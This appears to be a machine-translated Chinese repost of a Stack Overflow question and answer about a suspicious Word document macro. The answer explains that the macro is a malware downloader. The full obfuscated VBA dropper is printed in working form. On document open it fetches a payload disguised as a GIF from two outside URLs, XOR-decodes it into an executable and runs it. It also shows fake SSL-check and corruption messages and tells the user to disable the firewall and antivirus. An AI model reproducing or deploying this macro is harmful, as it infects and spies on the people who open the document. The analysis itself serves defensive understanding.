让堆栈溢出的示例上下文发布了此问题。

在这里，他尝试将其在Mac和Windows上的工作结合起来。

#If VBA7 And Win64 Then
Private Declare PtrSafe Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Sub Document_Open()

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte

#If Win64 Then
Dim kmvbf As LongLong
#Else
Dim kmvbf As Long
#End If

ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100

Set myRange = ActiveDocument.Content

With myRange.Font
 .Name = "Verdana"
 .Size = 14
End With

ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & "     Please wait..."

DoEvents
DoEvents
DoEvents
DoEvents

wyqud = lwyfu
zdwie = Gshwjf(0, "http://adenzia.ch/_vti_cnf/bug.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)

If zdwie <> 0 And rufhd < 152143 Then
zdwie = Gshwjf(0, "http://kingofstreets.de/class/meq.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
End If


If rufhd < 154743 Then
ActiveDocument.Content.Delete
MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
Exit Sub
End If

bldos = FreeFile
Open wyqud For Binary As #bldos
ReDim mufid(0 To LOF(bldos) - 1)
Get #bldos, , mufid()
Close #bldos

Call duwif(mufid())

wyqud = Left(wyqud, Len(wyqud) - 3)
wyqud = wyqud & "exe"

bldos = FreeFile
Open wyqud For Binary As #bldos
Put #bldos, , mufid()
Close #bldos


kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

ActiveDocument.Content.Delete
MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"

End Sub

Public Function lwyfu() As String
  Dim djfie As String * 512
  Dim pwifu As String * 576
  Dim dwuf As Long
  Dim wefkg As String
  dwuf = Uhdwuud(512, djfie)
  If (dwuf > 0 And dwuf < 512) Then
    dwuf = Uhduiuwd(djfie, 0, 0, pwifu)
    If dwuf <> 0 Then
        wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
    End If
    lwyfu = wefkg
  End If
End Function

Public Sub duwif(mufid() As Byte)
  Dim dfety As Long
  Dim bvjwi As Long
  Dim wbdys As Long
  Dim dvywi(256) As Byte
  Dim wdals As Long
  Dim dwiqh As Long


  bvjwi = UBound(mufid) + 1

  For dfety = 10 To 265
    dvywi(dfety - 10) = mufid(dfety)
  Next

  wdals = UBound(dvywi) + 1

  dwiqh = 0
  For dfety = 266 To (bvjwi - 267)
    mufid(dfety - 266) = mufid(dfety) Xor dvywi(dwiqh)
    dwiqh = dwiqh + 1

    If dwiqh = (wdals - 1) Then
        dwiqh = 0
    End If
  Next

  ReDim Preserve mufid(bvjwi - 267)

End Sub

评论是正确的；宏会下载并执行恶意软件/ spy 软件。

它会尝试两个GIF URL(如果下载失败，甚至会提示用户禁用防火墙/ AV)。这两个GIF是相同的(相同的SHA256校验和)，它们具有适当的GIF header 块(“GIF89a”)，甚至还有一些字节描述了什么是图像数据。

宏使用duwif()子例程(第105行)从下载的GIF中提取可执行二进制文件。它将二进制文件存储在一个临时文件中，该文件的引用由lwyfu()函数创建(第90行)。

然后，宏在第82行执行二进制文件:

kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

REM kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
MsgBox wyqud